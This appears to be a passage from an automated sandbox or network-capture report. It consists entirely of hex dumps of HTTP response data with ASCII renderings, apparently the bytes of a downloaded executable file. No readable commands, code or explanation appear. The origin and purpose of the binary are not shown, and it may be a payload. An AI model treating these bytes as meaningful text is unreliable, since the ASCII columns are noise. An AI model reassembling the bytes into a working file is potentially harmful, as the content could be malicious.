e5 b8 91 1d 5e bc 12 6e dc 17 a7 77 84 82 8c 60 60 10 37 01 da 20 66 fd fb ec d8 bd 24 22 a5 b0 2b 7d b3 61 c5 a8 4c 8c d3 b9
                  Data Ascii: !p6`63G"lhtG%X|JTlsoS#3SGOkK,Fro;HK8QtePa>x#|Hpz)OW2MW"7 h=$0zb<b3*`tIp!!Jx:vly~^nw``7 f$"+}aL
                  2023-01-13 15:04:35 UTC1243INData Raw: b9 03 22 39 2f be 76 c4 5f 51 5f 30 6b 62 07 6a d6 ad ff 05 85 c8 10 1f ee 65 1f e9 98 e5 8f 46 03 97 ab f8 ad 2d a0 36 06 9d 09 49 91 39 c5 c5 d6 c4 44 6d c3 60 6b 58 a0 cf b8 52 eb 90 13 e4 24 51 d6 66 72 a0 58 cd d8 e5 9e 4d b3 8a 88 59 3b 7f eb 39 42 8b bc 6e d3 20 fc ac ac 0b 12 02 73 c9 3a 9f 0e d8 4c cd 20 ba d4 f4 4b c8 e3 7e 90 ce 7f 05 71 83 c5 bc 9c 5a f2 b9 43 ea c1 7f b3 2e 1d 8b 40 36 1b 41 e2 a9 21 c8 09 7e d3 68 71 ee 8f aa a7 6f af 3e 69 5c 15 4f df 1a 9e 3e d2 22 f8 54 31 19 40 7b ff ec 7c c0 67 60 c9 bc 0c 87 58 d4 a1 fe b1 89 a7 33 ab a0 27 f6 29 d8 d6 92 0c ef ec 58 95 b5 31 ab 2f 06 47 9b 45 88 1d 66 d5 77 15 d6 09 00 a5 31 5b e1 68 7e b9 39 7f 54 11 f3 fd 4f 63 66 48 c4 39 29 70 02 4b 46 89 48 f4 87 78 f4 25 85 ec b2 b9 16 b1 10 0b
                  Data Ascii: "9/v_Q_0kbjeF-6I9Dm`kXR$QfrXMY;9Bn s:L K~qZC.@6A!~hqo>i\O>"T1@{|g`X3')X1/GEfw1[h~9TOcfH9)pKFHx%
                  2023-01-13 15:04:35 UTC1251INData Raw: 3d f9 c5 06 ff ad b8 90 ac 61 8c 2b 14 86 12 48 c2 a2 8f e9 a9 7b 6e 77 b6 11 18 49 3d 49 e1 91 c4 46 45 73 3c a6 c2 58 73 9d 37 33 0c d2 40 78 fe 1f 4c ff 00 65 18 15 3f 08 41 cc 58 d6 fb 0b 76 65 ef 26 7f 77 c5 7a 4b 82 e4 46 29 6a da a0 a5 ce 61 67 16 1f 33 a2 15 e0 5c b7 95 b4 85 a0 f9 51 63 7b d5 5f 28 b7 d5 1f 47 f1 23 01 c4 5e 79 3d c1 f0 7d ee 43 48 2e fc 18 c7 d7 06 44 15 0c ab 4a 86 42 7b 8c 43 b4 bd 83 92 e7 21 e4 30 0e 11 14 38 2f 31 93 bd 62 58 62 59 62 f3 1d 24 73 49 75 6d 6c d1 b1 50 9d af 96 1d 30 23 fb 9a b7 11 88 b7 c4 dc 65 77 0b 50 99 dd 08 9b 20 90 75 a2 e2 29 ef e3 1f 0d 46 90 98 78 f6 7f 39 e1 87 0c 48 50 d9 5f 5b c0 95 ae 6c cc 14 2f 0c f8 f4 c6 38 67 c4 b6 c6 e7 97 68 8a b9 33 cb 25 18 2a 9a a9 3d 87 ed 51 e2 f2 c0 50 d5 ca 34 6f
                  Data Ascii: =a+H{nwI=IFEs<Xs73@xLe?AXve&wzKF)jag3\Qc{_(G#^y=}CH.DJB{C!08/1bXbYb$sIumlP0#ewP u)Fx9HP_[l/8gh3%*=QP4o
                  2023-01-13 15:04:35 UTC1259INData Raw: 57 e8 eb cf 7a af a9 ed 7d e6 04 b0 b4 34 74 dd c5 8d b7 86 6d 64 20 4e 10 64 cf 18 d6 68 55 eb 1d 94 05 cf 50 2d 01 98 4a 8c e2 e7 32 95 cb dd 0a 90 4a 16 6d f2 08 d5 57 3a 97 af af b0 fd 34 05 14 39 90 f6 3a 2e c8 38 42 e0 62 73 89 b7 46 7b a1 ae 13 80 4c fb 9e fa af f6 87 77 d3 b9 55 60 d5 de dd 9a dc 8c ba 46 59 63 2e 46 ee c6 2b 28 67 6b 14 e2 65 b6 0e 09 16 bd 3f a8 a9 84 1c 1e a2 cd 0b af 7d 5c 11 e8 ed 5d 15 98 00 6b ad 07 c8 f9 3c 46 77 11 5d b1 1a d2 6d ab cd d5 56 5d 57 9f 0a e8 86 38 59 07 d2 06 c8 07 ce 05 76 02 f0 1b f1 bd da 6a d4 1c c2 45 2e a0 8e 79 9d 90 c0 d3 3d c9 2a 31 b3 cd d5 c5 6b 25 82 e3 81 bf 2b 84 d3 5c 13 2d fc 1c 8a c2 86 f5 c6 b0 d8 78 fe 9a 62 1e 00 d9 5e c2 da c8 e2 84 7e 42 ae 6c ae da 91 1d 37 e2 5d b9 12 58 89 a4 f0 c2
                  Data Ascii: Wz}4tmd NdhUP-J2JmW:49:.8BbsF{LwU`FYc.F+(gke?}\]k<Fw]mV]W8YvjE.y=*1k%+\-xb^~Bl7]X
                  2023-01-13 15:04:35 UTC1267INData Raw: 2c 21 b4 5c ec a4 91 36 94 64 88 40 40 8a a4 8c f9 7a f4 be 98 48 a3 01 29 e3 52 c0 93 b0 7c 5c a8 1f 26 b1 2d 3d 21 7a 29 c6 93 5a 29 e5 0d 50 5f 78 7a c4 f2 5a c4 81 76 2a 80 3b 26 91 82 0c 57 40 c2 a5 3f 95 2b 1d 25 1f 39 25 84 72 50 28 96 6e ed 6f 9d f1 51 3f e9 a5 7a c1 f5 5a 02 04 41 60 27 cb 5b 5f 69 70 30 40 0c 08 b0 5a fe 1a ac 64 f1 b0 40 ff 32 08 71 30 59 39 d4 a8 6b 35 79 eb f3 6a 09 29 48 29 25 a0 01 30 54 35 fd bb 22 97 50 25 20 e5 3d e8 53 c3 b0 7f b4 e3 34 c1 e4 62 83 21 34 4f c5 f5 9c 31 0f 96 bf 74 12 9e f5 6a 95 db ad 1b a8 74 22 83 54 00 05 30 37 5e c4 4f 45 34 1a 04 64 34 92 00 10 42 83 90 38 09 0b 62 a1 3a 28 09 40 f0 ee 3f 7e 22 11 9c c1 35 16 8c 65 d3 21 ea 64 0a 45 41 08 09 46 17 ae 23 10 95 54 62 11 01 9f 4b a9 90 9e e7 93 70 4e
                  Data Ascii: ,!\6d@@zH)R|\&-=!z)Z)P_xzZv*;&W@?+%9%rP(noQ?zZA`'[_ip0@Zd@2q0Y9k5yj)H)%0T5"P% =S4b!4O1tjt"T07^OE4d4B8b:(@?~"5e!dEAF#TbKpN
                  2023-01-13 15:04:35 UTC1274INData Raw: 74 06 ad 6a 4c e5 73 46 55 1e e3 c3 b4 3f 59 8c c3 a8 e6 bf 59 ec a6 ad 12 bd 75 b3 9a 56 e3 f9 02 c6 7f c3 96 06 f3 3f 31 74 bc 94 c3 f0 9a a3 4d a9 83 c3 95 36 46 cc 61 cd ca 65 91 e6 e6 88 1e af 02 dd 60 7e ae a1 68 4a bd 2a b4 e4 93 d5 6c ee 98 cc 61 5d 17 9b 6a e0 6c e7 6b 7d 3e 6b 30 a5 32 ff 34 26 16 17 b0 36 fc 64 ed 44 bf f1 c2 e6 e7 67 51 61 24 26 bc b0 68 5b ff d6 29 ab 61 3e d2 b2 46 ab 18 8e c4 2a c3 8f ac 3e db d9 82 df 5c 13 00 02 5e d2 2d d9 b4 5f 67 1f ca 54 d8 cb e8 9c 0f be 8e 8a 1f 8c 7e f2 71 c6 7e 2e 8b 6d 6d cd 21 88 c7 ad fb 92 57 cc 8c 16 53 ba 50 89 8f 98 1c c0 51 5e 7f eb 9d 58 f8 61 fe 35 88 86 16 2d ff f0 98 34 29 d1 2f 51 0a aa 9f c1 75 bf b4 91 22 fb ad d9 8c 55 1d 86 d0 a1 65 3c 86 a7 1e b4 78 fd 87 1f 9e 2e 6c ae 99 bd 9b
                  Data Ascii: tjLsFU?YYuV?1tM6Fae`~hJ*la]jlk}>k024&6dDgQa$&h[)a>F*>\^-_gT~q~.mm!WSPQ^Xa5-4)/Qu"Ue<x.l
                  2023-01-13 15:04:35 UTC1282INData Raw: 8a 7b 55 dd 43 4f a5 a7 3f 53 4f 1e da 68 ec 67 70 77 ea 0b 34 4f 2d b6 81 1d c2 fc b5 7a 84 69 79 22 ee c2 3e c2 1a ba 6e a4 47 76 2b d2 21 ad ab 16 9e 7d 99 1a b2 5b e3 c8 09 a3 5f 8e 51 dd 26 cb 7e 15 7f 48 5c b2 51 00 04 38 e0 f5 69 b0 ea ce 7f 1c 5e 04 9c e8 93 10 b3 62 87 78 d1 a7 f8 e0 b4 47 68 f9 43 53 49 8f 05 5f f8 57 3f 2e 84 58 cf c3 45 a2 af 96 15 75 5b e1 3e 2d 35 68 ad 4f ee 0a f9 f7 a4 a2 2e 29 6a 4e 56 5b d4 9b c3 92 d6 4a b3 76 94 88 a2 fe f0 2f 4f fa f8 bb dc 54 26 61 86 9d ee 98 54 73 5e 95 19 8c fc 7e bc a3 b7 15 6b 60 c1 6e 1c 8a 89 ff 60 b1 a2 f4 36 1a ea b8 38 b2 25 38 b7 f3 23 15 b3 08 8b 2a 35 3d 0d 42 f6 de 6f 58 e2 b0 6e cc ad 99 4e 59 8b 1f 55 04 f4 26 a2 50 17 de 94 d6 98 a4 cc f6 49 0a bb 2f 6d d3 9e b1 ba 59 9c 91 30 67 9b
                  Data Ascii: {UCO?SOhgpw4O-ziy">nGv+!}[_Q&~H\Q8i^bxGhCSI_W?.XEu[>-5hO.)jNV[Jv/OT&aTs^~k`n`68%8#*5=BoXnNYU&PI/mY0g
                  2023-01-13 15:04:35 UTC1290INData Raw: c0 50 7a 8e c5 9d b0 bb 83 4f 67 60 11 81 d4 67 a5 cd 54 d1 c6 65 c1 fd 28 81 74 33 41 a4 48 f3 bc 57 41 b2 8e 3d 63 54 64 5e 27 23 ce bd 4c 2f 01 17 a5 57 23 06 61 c2 fd dc 3b 1c 7c 8b f3 ac 98 21 c8 5a 9e d4 ed d6 76 25 94 fd b4 dc 48 cd 68 3d b1 16 54 9c 97 dd 29 be e6 4a bc 0e 6a d4 2f 57 e8 85 f4 a7 ad 75 33 d8 21 c4 5b e1 1a a3 03 94 0f e0 60 86 00 f4 3d 1b 28 66 dd 21 23 03 67 1e fd 0f ad 4a 9d 74 ba e7 cf 71 d8 6f 8f 9b d0 6a 6f ea 18 18 13 b7 9e 7f 9e 10 11 6a 0d 6c 46 e6 81 79 1b 81 21 26 a0 a2 7b 9c 4e e2 42 aa a9 df b0 91 c7 b2 d9 7a ff c6 64 bb c7 68 2c 3a c7 6f 27 d1 7f 31 e6 a4 9d 8d 5d 15 0c 50 8e 3e a9 42 0d 4f 88 9e 60 82 10 ed 1f 7c 3e 46 07 8e 8a a6 da f9 3b 25 92 63 c2 01 ba 06 7f fc c2 bd 19 a7 b0 71 f1 43 25 15 13 70 5a 1c 70 ee 44
                  Data Ascii: PzOg`gTe(t3AHWA=cTd^'#L/W#a;|!Zv%Hh=T)Jj/Wu3![`=(f!#gJtqojojlFy!&{NBzdh,:o'1]P>BO`|>F;%cqC%pZpD
                  2023-01-13 15:04:35 UTC1298INData Raw: 09 b4 2c 0e ba c8 16 01 fb 29 13 da 00 05 93 95 2e 99 d0 54 d2 6a 99 5a 9e a0 64 da c9 c4 e9 e9 59 69 73 79 0c 26 ca 4e 4a 4a cf 4d c3 19 0b d4 3e 01 e9 4a 4e 7e 35 31 5f 32 08 f2 74 68 59 3b 62 e9 fe f3 29 d1 31 31 eb 27 4d 4d fb c9 4c ba 9c cc ec bf 5e 2e cf 54 95 ce fd 6a 90 b5 95 fd e5 96 b5 a2 73 71 aa cf c0 f6 b0 bd 88 55 1b 2c 57 dd 11 ae 69 99 a9 f9 26 53 98 0b 2d 31 29 37 66 2e 9b 76 79 79 f9 d9 96 8e b2 52 96 d3 a5 86 e6 67 a2 7d c4 64 a3 c5 a9 89 3f a3 4c 20 4d 4c da 7e 7e c5 c8 ca 42 5a b7 ab 55 2e 8a ab c8 be 18 58 58 a5 cd 86 ea fe 71 bd 25 27 66 a5 66 e6 e6 e7 e7 a6 a5 e5 27 a6 e7 67 b7 a9 4f ca 5d cf 4e 24 98 4e b4 9d 2f 39 68 2b 7e 4a cd 70 74 d4 89 c1 8c af e6 24 ff cc b1 d6 9b 56 fa 26 ab 93 f3 2d 6a a5 af e2 26 b2 a0 1d 28 ab e2 64 55
                  Data Ascii: ,).TjZdYisy&NJJM>JN~51_2thY;b)11'MML^.TjsqU,Wi&S-1)7f.vyyRg}d?L ML~~BZU.XXq%'ff'gO]N$N/9h+~Jpt$V&-j&(dU
                  2023-01-13 15:04:35 UTC1306INData Raw: fe bf 30 0d ef be 51 d6 96 72 2c b6 10 8f 78 26 e1 21 6f ca 30 bf 12 f0 a3 9c c8 12 7b 5a 9a a6 bc 77 fe 6b ee ee d3 20 8c ef b3 76 21 57 c9 4c c2 6a 9d fb 0a 81 f0 d1 2f 99 33 7a a7 0e 37 e1 f8 a4 9c aa 3a 46 45 d3 41 dc dc 19 7a 52 b0 15 a1 7b 32 fe 43 b6 c9 40 5b 5f 60 e4 23 2d 2b 01 01 1f 11 ae d2 7d 16 39 76 83 3a 61 13 bc 7a a9 5d 7b b5 e8 09 4a 71 6d d1 50 c2 21 48 c4 0e 33 87 52 74 28 61 57 3e 88 f8 e9 e5 8a e7 ea ba 14 c2 c3 02 38 55 df 44 f1 1f 76 eb f4 9c 6d 22 4d 60 a6 e0 7d 67 9c dd bb 63 1d 67 23 71 5e 95 bd 5d 9a 8f 27 cf ef 72 ec 8f 55 2b 93 08 61 54 7d 61 27 ff ec 2d 4b 94 ff b6 d4 8e 89 5b 8a e4 45 9d e8 f3 8d 90 0f 7f 39 c5 d4 45 e2 d3 ef 46 31 e1 16 cb 43 08 7a 62 d4 43 89 58 93 81 98 38 76 e4 9c 74 dc 83 55 5e a8 31 f7 74 4e 66 50 a5
                  Data Ascii: 0Qr,x&!o0{Zwk v!WLj/3z7:FEAzR{2C@[_`#-+}9v:az]{JqmP!H3Rt(aW>8UDvm"M`}gcg#q^]'rU+aT}a'-K[E9EF1CzbCX8vtU^1tNfP
                  2023-01-13 15:04:35 UTC1313INData Raw: 2c b8 24 c5 86 bf d6 14 fa 2a 3e 81 f0 a6 83 95 8a dc 7d ea ac 22 0c 1e b3 72 78 9a e5 2f ab cd d0 7d 48 ab f5 b7 81 9b 36 e1 9c bc fe ef 57 65 9f 40 e6 30 1e e3 95 9c da 33 e2 3f 7b c1 22 e5 17 ef f4 e2 f7 22 cb 7c eb 53 47 9b c7 58 16 0b c9 65 1f 18 c5 48 d1 18 d0 52 e7 7c 29 90 49 18 9d 7c 2a c9 29 f1 08 28 0f be 11 b3 13 70 8d 5a c5 4f a1 93 4a 96 77 43 97 18 74 ea 9f d6 e7 22 c7 9f 94 24 47 83 90 09 d6 a5 06 2d 6e 6c a0 c3 28 cc 99 8f b3 8e b8 72 c9 37 79 79 e5 75 aa 82 db d0 08 f6 6a 3f 9f c6 01 f2 2c f1 dc 2c e6 e3 e4 f4 ef 89 74 63 3c 49 f3 1e 8b c7 3c 1e c7 3f 56 8b fa ae 31 b9 ee 23 28 20 c2 c3 b5 ef c4 8d fd c0 49 82 51 e1 9e 0a 4c 50 2e 91 28 b5 7a 06 a5 ec fe 40 1b f8 84 d3 2e 2f a6 23 20 96 a1 07 cf 29 89 a9 49 d2 ab df ef 4c c2 2b bf 5e 34
                  Data Ascii: ,$*>}"rx/}H6We@03?{""|SGXeHR|)I|*)(pZOJwCt"$G-nl(r7yyuj?,,tc<I<?V1#( IQLP.(z@./# )IL+^4
                  2023-01-13 15:04:35 UTC1321INData Raw: e1 7b 1b e4 0e 1c 89 e8 17 7b 77 42 99 2f 47 14 95 87 45 bd bb 11 6c a2 6d 75 bc 04 6a d1 81 e0 a0 51 7c ed c0 ef e6 9c a4 75 ef 55 dd 3f 75 65 dd 2c 1e 91 71 7b a8 75 dc 67 6e c6 2b b5 7f 3c c3 ff e7 ca e8 4a 14 fa 3e 0e 36 dc a0 df 09 45 e1 58 3a 79 24 3f 08 14 2c 3b 67 0a 6e 0a c3 c4 45 96 ba e9 e0 12 15 f2 54 b0 81 47 8e dd 3f d1 c4 7c 4c f3 4d 05 13 20 85 d1 68 4a 4f d1 ed ce 8b fe 1f d1 56 3e 3b 2b a0 17 10 cc 25 ca 8b fd 93 10 70 0c ea 4b 5e 81 24 7d f6 75 53 b7 ab fe e1 3f 85 9a d1 90 d2 e7 73 16 13 23 35 a4 34 f5 5e 15 12 32 b4 ff 57 2a 86 f5 d2 28 b6 2f 0b ce 7c 98 2a de 0d e6 84 83 47 8a cd b8 4d 03 f9 14 cc 05 55 53 06 2c 6e f9 2e eb cf 9d 34 2a a6 49 6f 03 40 d0 ee 4f 3a ed c0 c3 54 5c 3e e9 1b 72 10 61 bb 48 57 12 13 85 7c e9 63 b1 5f ea 09
                  Data Ascii: {{wB/GElmujQ|uU?ue,q{ugn+<J>6EX:y$?,;gnETG?|LM hJOV>;+%pK^$}uS?s#54^2W*(/|*GMUS,n.4*Io@O:T\>raHW|c_
                  2023-01-13 15:04:35 UTC1329INData Raw: 6f fa f0 b4 34 cf 77 48 9e 89 92 3a 19 7c c4 2e 4e 7c d4 9f a6 e6 1e b4 fd 15 37 2d 4e 1d 86 50 05 68 f9 98 bd ec e0 f1 7d da bb 83 0b c1 e4 fd a1 80 5b 39 ca 38 a9 76 ff 98 c4 f7 51 72 75 b7 08 36 f6 f6 21 e4 ae d3 aa 8f 19 e0 86 5c e9 5a 37 64 3f 23 ca d7 a2 5d f4 88 dc e6 ad 05 78 bb ff 4c ca 36 9f 2c c0 cd fd ea c2 cb 13 01 80 8a cc 03 d0 ed 09 6a 9a ab a8 8f e3 5b b7 12 35 6d f7 55 c3 a8 c4 03 0d 6b 2a 31 a6 7f 97 99 47 88 5b e9 ad e8 ec 86 b7 8c bd 3a 7d 8e 83 38 bc 86 7b 20 9e 74 42 9d f1 f8 b1 10 75 ff 2d bc 9c b9 61 32 9a 07 13 9a fb 6d 11 f6 5c fb db 37 76 fd 03 1f 4f 0c 4c b2 35 f1 b7 bd f1 ef bb 73 6e 05 fe 40 17 d9 13 da 59 35 4e 77 6e 34 6d ab 82 2d ed 47 6b 35 1a a3 fa 2c d7 ff d7 52 63 a5 44 db 9c d1 e2 65 bc c3 69 6f 85 ea 98 92 56 c1 91
                  Data Ascii: o4wH:|.N|7-NPh}[98vQru6!\Z7d?#]xL6,j[5mUk*1G[:}8{ tBu-a2m\7vOL5sn@Y5Nwn4m-Gk5,RcDeioV
                  2023-01-13 15:04:35 UTC1337INData Raw: f3 8c 66 c0 b8 9d 45 72 53 ff bd 5e b5 a9 d5 ab 12 57 42 a3 35 d3 c5 8a e1 57 8b 22 ee 30 37 a1 70 42 e0 d3 62 3c a1 8d 34 c6 14 29 5a 0d 43 a0 49 e9 5f 68 5a 10 60 6c 07 ca 61 61 d3 fc 80 cd b5 7e 7d d9 72 23 42 ac be ba 72 5b f9 bc 75 f6 a0 85 5f a9 f1 e2 ab f5 a3 ea 4f 5d 90 40 0c dd 2c 3f bd b3 ff b8 be 51 11 2e 30 8e 1f 30 be a0 f8 cc 8f 62 0f 64 89 74 7c 9e 56 12 f0 7f 80 2c fb 76 5b 54 60 42 58 dc d1 3e 44 b4 75 f3 d5 cc e5 1e b5 18 68 6b 9a e2 8f ea cd b4 8d 8a 30 53 d4 f2 eb 86 d6 5e 6c 14 79 24 78 6c ca 76 5f 2b bd 07 f7 03 a2 11 f7 f6 37 39 7a 3b cc bf 4c 4f 2d be 73 65 c1 5c db 1a ee 6b b3 79 d3 b3 da 77 95 eb 45 bf fa 89 2c ce 6c 75 23 7c af 28 5d f2 27 f6 fa 67 50 f7 01 61 09 92 d8 7f 83 5e fe 19 45 07 e6 47 8f ad e4 54 1b a2 bf ee ed e7 bb
                  Data Ascii: fErS^WB5W"07pBb<4)ZCI_hZ`laa~}r#Br[u_O]@,?Q.00bdt|V,v[T`BX>Duhk0S^ly$xlv_+79z;LO-se\kywE,lu#|(]'gPa^EGT
                  2023-01-13 15:04:35 UTC1345INData Raw: 3d c6 2d 86 b5 ad ba 6c 9b dd 68 69 84 8d c5 50 90 84 14 8b 63 a8 a3 54 5a 14 d1 90 d5 56 5f 6d b6 f6 0c ab 86 22 31 8c 01 10 99 a1 aa a2 80 bb 00 03 df 1f 57 a7 dc 4f 70 a4 a4 f7 c1 b8 2c aa 6f f9 da c6 05 5f fb f8 c2 b6 a3 0c 36 9a cd a5 b9 24 2b 14 4a 6b 86 45 b1 90 14 be 66 ab 6c c8 c2 79 d5 95 1b aa 38 33 68 e9 61 b6 75 b4 6a c3 61 92 7d bc 2f 2b e4 0e f3 46 a6 3c 57 17 06 b2 9d fe 37 42 82 d5 d5 37 00 89 5f 80 00 61 00 00 12 00 b0 19 31 03 93 b5 f3 9f f2 a5 f5 d8 72 b2 fb 3b 03 ff 82 bf 08 88 0e a2 a2 3f f2 15 c8 98 e1 2f 2c 04 90 3d 65 42 fc dc 5c dc 9d ef aa 73 be fc 99 7a ff 53 10 ac ac 9d 15 42 74 3b ac 10 9f fb b9 d6 48 ff c6 e7 b6 d8 fa b5 ef 0b 7d 93 f4 56 40 57 40 57 0c ae 84 ae 85 ae 31 5c e2 57 ca af 0a e2 2a 88 5e 21 ae 1c ae 88 5c 89 5d
                  Data Ascii: =-lhiPcTZV_m"1WOp,o_6$+JkEfly83hauja}/+F<W7B7_a1r;?/,=eB\szSBt;H}V@W@W1\W*^!\]
                  2023-01-13 15:04:35 UTC1352INData Raw: 12 42 01 1e 7a 76 21 04 b4 21 4e fe fb 5e 13 c3 47 ad 21 d0 7b 9c 02 6b a6 5d 0f 02 53 8b 0c 7f f3 c0 52 c4 20 54 21 21 ed b4 13 a7 d0 5e 9d 16 90 08 10 bd 87 84 b6 29 8b 9d 40 7b ea 5a 94 3f 42 a0 19 12 ab b5 0f d5 64 0c 75 d4 ab 0b cb c0 dd 2e ef f7 46 68 76 5b ea e5 11 da 92 97 ea d4 21 c4 d7 21 42 7e 9c 5a db 19 05 91 20 51 5b 65 93 50 be 97 ca 50 d3 f2 9e 7e b0 0c e6 ed b4 83 b5 c0 db 6b 95 d7 21 7d 20 f1 a5 d5 24 04 82 39 f5 e3 21 2c d6 21 f5 96 40 f9 b8 1c 35 5e 21 30 57 21 34 6e d0 ba de 8c 6e 8b 72 f8 04 07 c1 dc 4f 57 90 90 c8 ea a8 7a 32 a8 69 5d 85 b2 78 06 69 03 f8 d5 47 65 60 70 b4 48 b5 c0 06 ba 4f 0f 24 84 85 2d 3f e1 c0 52 fb ee 0e 83 a6 0d ef 02 dd a0 c3 fa 78 1f 06 37 5b 0a 04 4c 37 23 4f 03 49 5f 9f 6a 8a fc 89 36 12 c2 4a 1b 75 d3 86
                  Data Ascii: Bzv!!N^G!{k]SR T!!^)@{Z?Bdu.Fhv[!!B~Z Q[ePP~k!} $9!,!@5^!0W!4nnrOWz2i]xiGe`pHO$-?Rx7[L7#OI_j6Ju
                  2023-01-13 15:04:35 UTC1360INData Raw: 37 10 6b 0b 06 c4 81 8f 13 57 47 ea b9 fd e2 ed 5d 0b 20 b7 57 74 c4 ef a5 3a e7 f5 3b fc dd b5 9c 1e aa b8 7e b9 76 1a 4d 8e 0f f3 56 bc a5 8f 4c a8 0d ff 6f e5 b3 a9 d5 ba 3e 65 4d a7 68 c4 d5 fd d4 1a ee 02 a3 d9 8f e7 df 5e ef 34 0b 53 4f 35 05 fa 0b ee cb 47 53 b5 ff d7 54 f7 fe bf ad f4 af af ba 4f 9f 3c 00 80 54 79 6e fd b7 7d 6e d8 af 6f 4a cf 7b ae e4 93 c5 15 bf 48 d1 ea b0 61 bc 2f de 53 d2 8a 4f 95 0d 37 c8 1c 98 17 4a 05 db 54 34 5e 79 74 01 ee 05 e2 09 ee 8f 56 cf af ef 0f 6f ef 0f 10 cf 0f b4 3e e6 09 01 e5 aa 02 45 03 b7 3d 7e 2a d1 82 2e 4f ae 2a 2f 50 f0 6f 1f 50 ab 86 aa ad 1e a0 f4 9e fa 70 f6 da f1 f8 be c4 b9 aa 88 2c d8 27 3e 25 17 c5 20 5e 95 1f 3c 3f 55 a9 a3 03 e1 81 15 4c bf b9 5f 45 5f e0 1e de df 7e 2a 1f 53 7e d1 74 b9 52 5d
                  Data Ascii: 7kWG] Wt:;~vMVLo>eMh^4SO5GSTO<Tyn}noJ{Ha/SO7JT4^ytVo>E=~*.O*/PoPp,'>% ^<?UL_E_~*S~tR]
                  2023-01-13 15:04:35 UTC1368INData Raw: d1 5f 4d 93 c5 83 3d 94 2d 20 d7 18 56 6d 39 42 6f a1 ff f6 b0 4b 5e cf 72 16 00 90 00 00 e5 04 04 90 84 ab c8 2d 80 00 00 00 f7 01 ae fe 57 98 2e 77 38 9c d4 db 00 00 0f 00 cf 71 cd fe 3f 7c a0 de 00 00 4e 00 fe 31 7d 61 c6 56 77 ee 00 f6 00 10 00 00 28 2b 9e 00 ef 3c ac b2 90 23 00 01 00 00 ff 03 5f 28 3c 1e 00 ff 00 02 00 00 79 07 01 40 ed e7 c6 e5 60 1e 00 00 e0 02 dc 93 ab 36 15 a6 cb dd 0e a7 e6 36 11 b2 5c 8d 1c 21 e1 f5 29 67 00 00 00 00 cd 56 bb 3b d5 a7 7d be ed 53 00 f5 00 00 71 02 e7 8f 13 7d b3 53 aa 5e fa 66 10 00 00 00 3a 00 40 cb fa 07 3e d1 d4 9d d8 4d 40 00 00 00 f3 00 03 e0 a3 6c dd 5e eb 72 90 d3 00 01 00 00 9c 03 fe 75 c0 fe be 13 76 69 00 f5 00 00 1a 03 96 25 80 6d 00 00 38 00 00 f8 b9 1f d3 f7 1e 35 51 13 00 f2 cd 3f 53 d3 00 d4 00
                  Data Ascii: _M=- Vm9BoK^r-W.w8q?|N1}aVw(+<#_(<y@`66\!)gV;}Sq}S^f:@>M@l^ruvi%m85Q?S
                  2023-01-13 15:04:35 UTC1376INData Raw: 99 f7 fa e3 24 29 21 48 aa 34 97 9f 60 a4 d9 d3 50 df 1e 38 a9 88 9c a0 6e 26 77 9e d3 1d 28 3f 75 ca 0d fe 80 4f f5 60 5a 51 26 ab fd ce 7d f7 89 59 f3 15 ab ce e2 ec 82 aa a4 8e e1 9f 44 0e e0 72 6f d1 7d ce 11 f0 0f d3 44 89 9b b8 83 5e 1f 5d b4 8d 09 fe 3c 56 6d f2 2e e7 77 09 a2 0f 11 71 4b d5 7d 53 fe e6 79 97 ac f0 73 fc 19 c2 40 59 a1 d4 26 a5 b7 e6 fb 44 bb c6 9a d2 bf 15 ae 4d 4d c8 3d d4 b7 84 ac 60 ae e4 09 9d e8 ed 3a 2e 1b da d9 02 17 a7 c3 24 b9 a8 4a 6b 8b 9a c4 aa 8e a1 0a 31 4b 1e d6 36 09 78 b8 a2 8c 29 ad e8 b9 2b 8a 93 69 fc 09 b5 1c 92 11 c8 91 9c 92 97 e7 63 8d d8 57 de 34 5b 85 df 46 57 d2 c6 24 90 02 6b 29 63 dc c2 79 9f cf c4 c8 5f 80 1f 8a 71 d0 e8 eb fe e6 b9 83 7b e8 17 c7 ca 58 c3 27 1e 4d 46 df 83 2e 21 f3 bc 4b a9 09 2d f9
                  Data Ascii: $)!H4`P8n&w(?uO`ZQ&}YDro}D^]<Vm.wqK}Sys@Y&DMM=`:.$Jk1K6x)+icW4[FW$k)cy_q{X'MF.!K-
                  2023-01-13 15:04:35 UTC1384INData Raw: 31 da 31 e3 31 e8 31 05 32 15 32 24 32 30 32 36 32 42 32 48 32 63 32 a6 32 b8 32 eb 32 f1 32 02 33 08 33 0d 33 18 33 1e 33 2d 33 41 33 4e 33 5d 33 7f 33 8d 33 98 33 9e 33 a6 33 b6 33 bb 33 cf 33 d5 33 f1 33 03 34 09 34 0e 34 13 34 43 34 76 34 80 34 af 34 c0 34 07 35 16 35 3c 35 6e 35 bb 35 c8 35 d7 35 67 36 6d 36 a0 36 c3 36 f9 37 23 38 3a 38 83 38 a8 38 32 3a 80 3a 2c 3b 5e 3b b5 3b e3 3b 13 3c 18 3c 49 3c 4e 3c c3 3c d6 3c 03 3d 3d 3d 42 3d 83 3d e7 3d 40 3e 5e 3e 6b 3e 85 3e cd 3e ea 3e f0 3e f6 3e fc 3e 06 3f 0c 3f 22 3f 28 3f 30 3f 36 3f 3e 3f 5e 3f 64 3f 99 3f ae 3f b3 3f c6 3f cb 3f d5 3f e0 3f 00 00 00 80 00 00 58 01 00 00 06 30 0c 30 26 30 32 30 38 30 44 30 5c 30 73 30 96 30 b0 30 b8 30 c4 30 da 30 01 31 0b 31 18 31 3b 31 55 31 8b 31 9e 31 a4 31
                  Data Ascii: 111122$20262B2H2c2222233333-3A3N3]333333333334444C4v444455<5n5555g6m6667#8:8882::,;^;;;<<I<N<<<===B===@>^>k>>>>>>>??"?(?0?6?>?^?d????????X00&02080D0\0s000000111;1U1111
                  2023-01-13 15:04:35 UTC1392INData Raw: 35 ec 35 50 36 55 36 b7 36 cd 36 d4 36 13 37 4a 38 9a 38 a7 38 e4 38 fa 38 8d 39 00 3a 12 3a 32 3a 63 3a 36 3b 94 3b b5 3b d6 3b 0d 3c 7c 3c 90 3c c5 3c e3 3c 18 3d 27 3d 48 3d 5f 3d ba 3d 1b 3e 39 3e 59 3e bc 3e c1 3e 18 3f 1d 3f 47 3f 4c 3f 91 3f 96 3f ce 3f 00 00 00 70 03 00 48 01 00 00 05 30 43 30 64 30 c7 30 d8 30 ed 30 21 31 37 31 4c 31 8a 31 d2 31 0e 32 28 33 53 33 62 33 b7 33 eb 33 f8 33 05 34 0a 34 1d 34 2a 34 2f 34 59 34 5e 34 9a 34 a7 34 b4 34 b9 34 cc 34 d9 34 de 34 08 35 0d 35 3b 35 48 35 55 35 5a 35 71 35 7e 35 83 35 b1 35 b6 35 ea 35 f7 35 04 36 09 36 1c 36 